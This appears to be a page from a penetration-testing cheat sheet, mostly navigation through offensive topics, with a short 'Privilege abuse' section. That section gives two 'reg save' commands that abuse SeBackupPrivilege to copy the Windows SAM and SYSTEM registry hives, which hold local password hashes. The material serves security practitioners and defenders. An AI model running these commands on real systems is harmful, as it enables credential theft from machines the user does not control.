Navigation : Reconnaissance Enumeration Exploitation Post-Exploitation - Post-Exploitation Unix - Post-Exploitation Windows -- Lateral movements -- File transfer -- Privilege escalation --- Patches Detection --- Services and Processes --- Registry --- Schedules Tasks --- Startup Applications --- Password mining --- Change user / Impersonation --- Admin2System --- Exploits --- Privilege abuse -- Data Mining - Exfiltration -- Enable/Disable services - Pivoting / tunneling - Password cracking Web Wi-Fi Physical access Misc Forensic Privilege abuse Ressource https://github.com/decoder-it/whoami-priv/raw/master/whoamipriv.pdf SeBackupPrivilege reg save HKLM\SYSTEM c:\temp\system.hive reg save HKLM\SAM c:\temp\sam.hive Exploits Data Mining - Exfiltration